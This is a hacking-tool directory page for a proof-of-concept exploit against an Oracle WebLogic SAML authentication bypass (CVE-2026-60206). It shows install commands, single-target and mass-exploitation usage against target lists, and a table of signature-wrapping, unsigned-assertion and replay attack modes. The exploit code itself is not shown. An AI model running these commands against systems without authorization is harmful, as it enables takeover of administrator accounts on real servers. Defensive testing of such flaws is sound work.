Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
POC-CVE-2026-60206 — cve cve-2026-60206 weblogic saml exploit poc vulnerability oracle scanner security | Kitploit
Tools/GitHubGitHub/imbas007/poc-cve-2026-60206
Authentication & AuthorizationVulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubimbas007/poc-cve-2026-60206

POC-CVE-2026-60206

cve cve-2026-60206 weblogic saml exploit poc vulnerability oracle scanner security

View Repository
32951 month agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-60206 — Oracle WebLogic SAML Auth Bypass

CVE CVSS

CVSS 9.9 — SAML authentication bypass in Oracle WebLogic Server Core.
Affected: 12.2.1.4.0 14.1.1.0.0 14.1.2.0.0 15.1.1.0.0

⚠️ Authorized security testing only.


Install

root@kitploit:~
git clone https://github.com/imbas007/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt

Usage

Single target

root@kitploit:~
# Detect version + SAML endpoints
python3 CVE-2026-60206-exploit.py -t https://target:7002 --detect

# Full exploit (all attack vectors)
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode all -u weblogic

# Specific mode
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode combo -u admin -v

# With proxy
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode all --proxy http://127.0.0.1:8080 --no-verify

Mass scan

root@kitploit:~
# Detect only
python3 CVE-2026-60206-exploit.py -l targets.txt -o results.json

# Detect + exploit (faster)
python3 CVE-2026-60206-exploit.py -l targets.txt --exploit --no-verify -T 30 -o results.json

# Single URL mass mode
python3 CVE-2026-60206-exploit.py -l https://target:7002 --exploit

Targets file (one per line):

root@kitploit:~
192.168.1.100:7002
https://10.0.0.50
example.com

List attack modes

root@kitploit:~
python3 CVE-2026-60206-exploit.py --list-modes

Attack Modes


Project Structure

root@kitploit:~
CVE-2026-60206/
├── CVE-2026-60206-exploit.py   # Main script (single + mass)
├── mass_scan.py                # Mass scanner module
├── modules/
│   ├── samlib.py               # SAML manipulation (XSW, NameID, etc.)
│   ├── weblogic_client.py      # WebLogic HTTP client
│   └── logger.py               # Colored logging
├── requirements.txt
└── README.md

References

  • Oracle July 2026 CPU
  • NVD: CVE-2026-60206
  • WebLogic SAML CVE-2018-2933 & CVE-2018-2998
Download Tool
ModeDescription
unsignedUnsigned SAML assertion injection
xswXML Signature Wrapping (4 variants)
nameidNameID manipulation / comment injection
comboCombined: XSW + Unsigned + NameID ⭐
audienceAudienceRestriction bypass
conditionsTime/validity restriction bypass
replaySAML response replay
allRun everything